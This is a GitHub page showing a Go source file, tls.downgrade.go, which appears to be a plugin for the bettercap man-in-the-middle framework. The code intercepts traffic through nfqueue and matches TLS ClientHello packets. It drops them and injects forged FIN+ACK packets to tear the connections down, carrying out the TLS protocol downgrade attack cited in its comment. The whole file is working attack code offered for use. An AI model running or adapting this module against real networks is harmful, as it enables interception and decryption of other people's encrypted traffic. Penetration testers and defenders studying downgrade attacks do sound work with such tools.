-
Notifications
You must be signed in to change notification settings - Fork 7
/
tls.downgrade.go
98 lines (82 loc) · 2.41 KB
/
tls.downgrade.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
package main
import (
"net"
"regexp"
"github.com/bettercap/bettercap/log"
"github.com/bettercap/bettercap/packets"
"github.com/bettercap/bettercap/session"
"github.com/chifflier/nfqueue-go/nfqueue"
"github.com/evilsocket/islazy/tui"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
)
var (
clientHelloRe = regexp.MustCompile(`\x16\x03\x01.{2}\x01`)
)
func getLayers(packet gopacket.Packet) (ip *layers.IPv4, tcp *layers.TCP, ok bool) {
ipLayer := packet.Layer(layers.LayerTypeIPv4)
if ipLayer == nil {
return nil, nil, false
}
ip, ok = ipLayer.(*layers.IPv4)
if ok == false || ip == nil {
return nil, nil, false
}
tcpLayer := packet.Layer(layers.LayerTypeTCP)
if tcpLayer == nil {
return nil, nil, false
}
tcp, ok = tcpLayer.(*layers.TCP)
if ok == false || tcp == nil {
return nil, nil, false
}
return
}
// "FIN, ACK"
func tcpReset(src net.IP, dst net.IP, srcPort layers.TCPPort, dstPort layers.TCPPort, seq uint32, ack uint32) (error, []byte) {
eth := layers.Ethernet{
SrcMAC: session.I.Interface.HW,
DstMAC: session.I.Gateway.HW,
EthernetType: layers.EthernetTypeIPv4,
}
ip4 := layers.IPv4{
Protocol: layers.IPProtocolTCP,
Version: 4,
TTL: 64,
SrcIP: src,
DstIP: dst,
}
tcp := layers.TCP{
SrcPort: srcPort,
DstPort: dstPort,
Seq: seq,
Ack: ack,
FIN: true,
ACK: true,
}
tcp.SetNetworkLayerForChecksum(&ip4)
return packets.Serialize(ð, &ip4, &tcp)
}
// as per https://p16.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack
func OnPacket(payload *nfqueue.Payload) int {
verdict := nfqueue.NF_ACCEPT
if clientHelloRe.Match(payload.Data) == true {
packet := gopacket.NewPacket(payload.Data, layers.LayerTypeIPv4, gopacket.Default)
ip, tcp, ok := getLayers(packet)
if ip != nil && tcp != nil && ok == true {
log.Warning("[%s] Dropping TLS ClientHello from %s to %s:%d", tui.Green("tls.downgrade"), ip.SrcIP.String(), ip.DstIP.String(), tcp.DstPort)
if err, raw := tcpReset(ip.SrcIP, ip.DstIP, tcp.SrcPort, tcp.DstPort, tcp.Seq, tcp.Ack); err == nil {
if err := session.I.Queue.Send(raw); err != nil {
log.Error("Error sending FIN+ACK packet: %s", err)
} else {
log.Debug("Sent %d bytes of FIN+ACK packet", len(raw))
verdict = nfqueue.NF_DROP
}
} else {
log.Error("Error creating FIN+ACK packet: %s", err)
}
}
}
payload.SetVerdict(verdict)
return 0
}